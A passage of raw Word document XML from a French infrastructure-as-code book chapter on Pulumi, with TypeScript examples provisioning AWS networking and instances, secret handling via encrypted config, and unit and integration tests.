      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes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Installation et premier projet</w:t>
        <w:br/>
        <w:t>pulumi new typescript --name infra-demo</w:t>
        <w:br/>
        <w:br/>
        <w:t># Commandes essentielles</w:t>
        <w:br/>
        <w:t>pulumi preview       # équivalent de plan</w:t>
        <w:br/>
        <w:t>pulumi up            # appliquer, avec confirmation</w:t>
        <w:br/>
        <w:t>pulumi destroy       # supprimer</w:t>
        <w:br/>
        <w:t>pulumi stack ls</w:t>
        <w:br/>
        <w:t>pulumi config set environnement production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="88" name="Picture 88"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f86.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.86 — Le cycle Pulumi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>75.2 Écrire un programme</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un programme décrit des ressources et leurs dépendances par les références entre objets. La sortie d'une ressource alimente l'entrée d'une autre, ce qui construit le graphe d'exécution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une infrastructure complète · ts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import * as aws from "@pulumi/aws";</w:t>
        <w:br/>
        <w:br/>
        <w:t>const config = new pulumi.Config();</w:t>
        <w:br/>
        <w:t>const environnement = config.require("environnement");</w:t>
        <w:br/>
        <w:br/>
        <w:t>const vpc = new aws.ec2.Vpc("vpc", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cidrBlock: "10.0.0.0/16",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tags: { Projet: "demo", Environnement: environnement },</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>const sousReseau = new aws.ec2.Subnet("app", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  vpcId: vpc.id,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cidrBlock: "10.0.1.0/24",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  availabilityZone: "eu-west-3a",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tags: { Projet: "demo", Environnement: environnement },</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>const groupe = new aws.ec2.SecurityGroup("app", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  vpcId: vpc.id,</w:t>
        <w:br/>
        <w:t>ingress: [{ protocol: "tcp", fromPort: 443, toPort: 443, cidrBlocks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ["0.0.0.0/0"] }],</w:t>
        <w:br/>
        <w:t>egress: [{ protocol: "-1", fromPort: 0, toPort: 0, cidrBlocks: ["0.0.0.0/0"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }],</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>export const vpcId = vpc.id;</w:t>
        <w:br/>
        <w:t>export const sousReseauId = sousReseau.id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.282 — Six équivalences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49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Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Terraform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Pulumi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pulumi.Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Sortie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>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export const</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonction ou paquet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Boucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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for_each</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Boucle du langage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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sensitive = true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>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pulumi.secret()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>75.3 Ce que le langage apporte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un langage généraliste permet d'exprimer des règles complexes sans contorsion. Il permet aussi d'écrire du code illisible : la discipline reste nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une logique exprimée naturellement · ts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Une boucle et une règle métier, sans astuce de DSL</w:t>
        <w:br/>
        <w:t>const environnements = ["dev", "staging", "prod"] as const;</w:t>
        <w:br/>
        <w:br/>
        <w:t>const instances = Object.fromEntries(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  environnements.map((env) =&gt; [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    env,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    new aws.ec2.Instance(`app-${env}`, {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ami: "ami-0123456789abcdef0",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      instanceType: env === "prod" ? "t3.small" : "t3.micro",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      subnetId: sousReseau.id,</w:t>
        <w:br/>
        <w:t xml:space="preserve">      tags: { Environnement: env, Projet: "demo" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ])</w:t>
        <w:br/>
        <w:t>);</w:t>
        <w:br/>
        <w:br/>
        <w:t>export const adresses = Object.fromEntries(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Object.entries(instances).map(([env, i]) =&gt; [env, i.publicIp])</w:t>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des garde-fous explicites · ts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Validation d'entrée avant toute création</w:t>
        <w:br/>
        <w:t>const environnement = config.require("environnement");</w:t>
        <w:br/>
        <w:t>if (!["dev", "staging", "prod"].includes(environnement)) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  throw new Error(`Environnement invalide : ${environnement}`);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Règle de sécurité vérifiée par le type et par le code</w:t>
        <w:br/>
        <w:t>const portsAutorises = environnement === "prod" ? [443] : [443, 8080];</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UNE INFRASTRUCTURE N'EST PAS UNE APPLICATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un langage généraliste invite à écrire des abstractions élaborées. Or une infrastructure doit rester lisible par quelqu'un qui ne connaît pas le programme : privilégiez les fonctions courtes et les noms explicites.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>75.4 État et secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pulumi stocke l'état sur Pulumi Cloud par défaut, ou dans un back-end autogéré. Les secrets sont chiffrés dans l'état et dans les sorties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes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Back-end autogéré compatible S3</w:t>
        <w:br/>
        <w:t>pulumi login s3://mon-pulumi-state</w:t>
        <w:br/>
        <w:br/>
        <w:t># Secrets chiffrés par le fournisseur de chiffrement</w:t>
        <w:br/>
        <w:t>pulumi config set --secret dbPassword 'motdepasse'</w:t>
        <w:br/>
        <w:t>pulumi config get --show-secrets dbPassword</w:t>
        <w:br/>
        <w:br/>
        <w:t># Utilisation dans le programme</w:t>
        <w:br/>
        <w:t>const mdp = config.requireSecret("dbPassword");</w:t>
        <w:br/>
        <w:t>new aws.rds.Instance("db", { password: mdp, /* ... */ });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.283 — Quatre emplacements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69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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Chiffrement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pulumi Cloud ou back-end</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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Fichier ou back-end</w:t>
            </w:r>
          </w:p>
        </w:tc>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Secrets chiffrés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sorties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État</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Selon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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Journaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Pulumi Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>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Selon configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>75.5 Tester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Parce que l'infrastructure est du code, elle se teste avec les outils du langage. Les tests d'unité valident les décisions, un test d'intégration vérifie le déploiement réel dans un environnement jetable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux tests utiles · ts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import { describe, it, expect } from "vitest";</w:t>
        <w:br/>
        <w:t>import { typeRessource } from "./infra";</w:t>
        <w:br/>
        <w:br/>
        <w:t>describe("taille des instances", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  it("utilise une petite instance en développement", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    expect(typeRessource("dev")).toBe("t3.micro");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  it("utilise une instance plus grande en production", () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    expect(typeRessource("prod")).toBe("t3.small");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un cycle complet jetable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Test d'intégration dans une pile jetable</w:t>
        <w:br/>
        <w:t>pulumi stack init test-$(date +%s)</w:t>
        <w:br/>
        <w:t>pulumi up --yes --skip-preview</w:t>
        <w:br/>
        <w:t>pulumi destroy --yes</w:t>
        <w:br/>
        <w:t>pulumi stack rm --yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.284 — Quatre niveaux de test</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53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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Détecte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
